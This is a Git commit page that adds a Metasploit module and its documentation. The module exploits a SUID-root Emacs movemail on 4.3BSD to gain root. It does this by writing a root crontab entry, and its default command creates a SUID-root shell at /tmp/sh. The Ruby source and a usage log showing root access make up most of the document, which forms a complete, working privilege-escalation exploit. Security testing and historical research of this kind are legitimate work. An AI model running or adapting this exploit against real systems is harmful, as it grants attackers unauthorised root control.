Land #11049, Add Emacs movemail local exploit
parent
c704552ca4
commit
67cddffc51
|
@ -0,0 +1,61 @@
|
||||||
|
## Intro
|
||||||
|
|
||||||
|
This module exploits a SUID installation of the Emacs `movemail` utility
|
||||||
|
to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
|
||||||
|
The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.
|
||||||
|
|
||||||
|
## Setup
|
||||||
|
|
||||||
|
A Docker environment for 4.3BSD on VAX is available at
|
||||||
|
<https://github.com/wvu/ye-olde-bsd>.
|
||||||
|
|
||||||
|
For manual setup, please follow the Computer History Wiki's
|
||||||
|
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
|
||||||
|
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
|
||||||
|
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
|
||||||
|
|
||||||
|
## Targets
|
||||||
|
|
||||||
|
```
|
||||||
|
Id Name
|
||||||
|
-- ----
|
||||||
|
0 /usr/lib/crontab.local
|
||||||
|
```
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**MOVEMAIL**
|
||||||
|
|
||||||
|
Set this to the absolute path to the SUID-root `movemail` executable.
|
||||||
|
|
||||||
|
**CMD**
|
||||||
|
|
||||||
|
If your payload is `cmd/unix/generic` (suggested default), set this to
|
||||||
|
the command you want to run as root. The provided default will create a
|
||||||
|
SUID-root shell at `/tmp/sh`.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 exploit(unix/local/emacs_movemail) > run
|
||||||
|
|
||||||
|
[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
|
||||||
|
[*] Current shell is /bin/sh
|
||||||
|
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
|
||||||
|
[+] SUID-root [redacted] found
|
||||||
|
[*] Preparing crontab with payload
|
||||||
|
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
|
||||||
|
* * * * * root rm -f /usr/lib/crontab.local
|
||||||
|
[*] Creating writable /usr/lib/crontab.local
|
||||||
|
[+] Writing crontab to /usr/lib/crontab.local
|
||||||
|
[!] Please wait at least one minute for effect
|
||||||
|
[*] Exploit completed, but no session was created.
|
||||||
|
msf5 exploit(unix/local/emacs_movemail) > sessions -1
|
||||||
|
[*] Starting interaction with 1...
|
||||||
|
|
||||||
|
ls -l /usr/lib/crontab.local /tmp/sh
|
||||||
|
/usr/lib/crontab.local not found
|
||||||
|
-rwsr-xr-x 1 root 23552 Nov 22 15:17 /tmp/sh
|
||||||
|
/tmp/sh -c whoami
|
||||||
|
root
|
||||||
|
```
|
|
@ -0,0 +1,163 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Local
|
||||||
|
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Post::File
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Emacs movemail Privilege Escalation',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a SUID installation of the Emacs movemail utility
|
||||||
|
to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
|
||||||
|
The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'Markus Hess', # Discovery? atrun(8) exploit for sure
|
||||||
|
'Cliff Stoll', # The Cuckoo's Egg hacker tracker
|
||||||
|
'wvu' # Module and additional research
|
||||||
|
],
|
||||||
|
'References' => [
|
||||||
|
%w[URL https://en.wikipedia.org/wiki/Movemail],
|
||||||
|
%w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
|
||||||
|
%w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
|
||||||
|
%w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
|
||||||
|
%w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
|
||||||
|
%w[URL https://mailutils.org/manual/html_node/movemail.html]
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'unix',
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'SessionTypes' => %w[shell],
|
||||||
|
'Privileged' => true,
|
||||||
|
'Payload' => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
|
||||||
|
'Targets' => [['/usr/lib/crontab.local', {}]],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => {
|
||||||
|
'PAYLOAD' => 'cmd/unix/generic',
|
||||||
|
'CMD' => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
|
||||||
|
}
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
|
||||||
|
])
|
||||||
|
|
||||||
|
register_advanced_options([
|
||||||
|
OptBool.new('ForceExploit', [false, 'Override check result', false])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def bin_path
|
||||||
|
'/bin:/usr/bin:/usr/ucb:/etc'
|
||||||
|
end
|
||||||
|
|
||||||
|
def movemail
|
||||||
|
datastore['MOVEMAIL']
|
||||||
|
end
|
||||||
|
|
||||||
|
def crontab_local
|
||||||
|
'/usr/lib/crontab.local'
|
||||||
|
end
|
||||||
|
|
||||||
|
def crontab(cmd)
|
||||||
|
"* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
|
||||||
|
end
|
||||||
|
|
||||||
|
# uname(1) does not exist, technique from /etc/rc.local
|
||||||
|
def is_43bsd?
|
||||||
|
cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
|
||||||
|
end
|
||||||
|
|
||||||
|
# id(1) does not exist
|
||||||
|
def is_root?
|
||||||
|
cmd_exec('whoami').include?('root')
|
||||||
|
end
|
||||||
|
|
||||||
|
# test -u does not exist
|
||||||
|
def setuid_root?(path)
|
||||||
|
cmd_exec("find #{path} -user root -perm -4000 -print").include?(path)
|
||||||
|
end
|
||||||
|
|
||||||
|
def setup
|
||||||
|
super
|
||||||
|
|
||||||
|
vprint_status("Setting a sane $PATH: #{bin_path}")
|
||||||
|
|
||||||
|
case cmd_exec('echo $SHELL')
|
||||||
|
when %r{/bin/sh}
|
||||||
|
vprint_status('Current shell is /bin/sh')
|
||||||
|
cmd_exec("PATH=#{bin_path}; export PATH")
|
||||||
|
when %r{/bin/csh}
|
||||||
|
vprint_status('Current shell is /bin/csh')
|
||||||
|
cmd_exec("setenv PATH #{bin_path}")
|
||||||
|
else
|
||||||
|
vprint_bad('Current shell is unknown')
|
||||||
|
end
|
||||||
|
|
||||||
|
vprint_status("$PATH is #{cmd_exec('echo $PATH').chomp}")
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
unless is_43bsd?
|
||||||
|
vprint_warning('System does not appear to be 4.3BSD')
|
||||||
|
end
|
||||||
|
|
||||||
|
unless file?(movemail)
|
||||||
|
vprint_bad("#{movemail} not found")
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
unless movemail.end_with?('movemail')
|
||||||
|
vprint_warning("#{movemail} has an unexpected name")
|
||||||
|
end
|
||||||
|
|
||||||
|
unless setuid_root?(movemail)
|
||||||
|
vprint_status("Non-SUID-root #{movemail} found")
|
||||||
|
return CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
vprint_good("SUID-root #{movemail} found")
|
||||||
|
CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
if is_root?
|
||||||
|
print_good('Session is already root, executing payload directly')
|
||||||
|
return cmd_exec(payload.encoded)
|
||||||
|
end
|
||||||
|
|
||||||
|
unless check == CheckCode::Appears || datastore['ForceExploit']
|
||||||
|
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
|
||||||
|
end
|
||||||
|
|
||||||
|
# outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
|
||||||
|
if file?(crontab_local)
|
||||||
|
fail_with(Failure::NoTarget, "#{crontab_local} already exists")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status('Preparing crontab with payload')
|
||||||
|
tab = crontab(payload.encoded)
|
||||||
|
vprint_line(tab)
|
||||||
|
|
||||||
|
# umask (umask (0) & 0333);
|
||||||
|
# (void) ftruncate (indesc, 0L);
|
||||||
|
print_status("Creating writable #{crontab_local}")
|
||||||
|
cmd_exec("(umask 0 && #{movemail} /dev/null #{crontab_local})")
|
||||||
|
|
||||||
|
unless writable?(crontab_local)
|
||||||
|
fail_with(Failure::NoAccess, "#{crontab_local} is not writable")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("Writing crontab to #{crontab_local}")
|
||||||
|
cmd_exec("echo '#{tab.gsub("'", "'\\\\''")}' > #{crontab_local}")
|
||||||
|
print_warning('Please wait at least one minute for effect')
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
Loading…
Reference in New Issue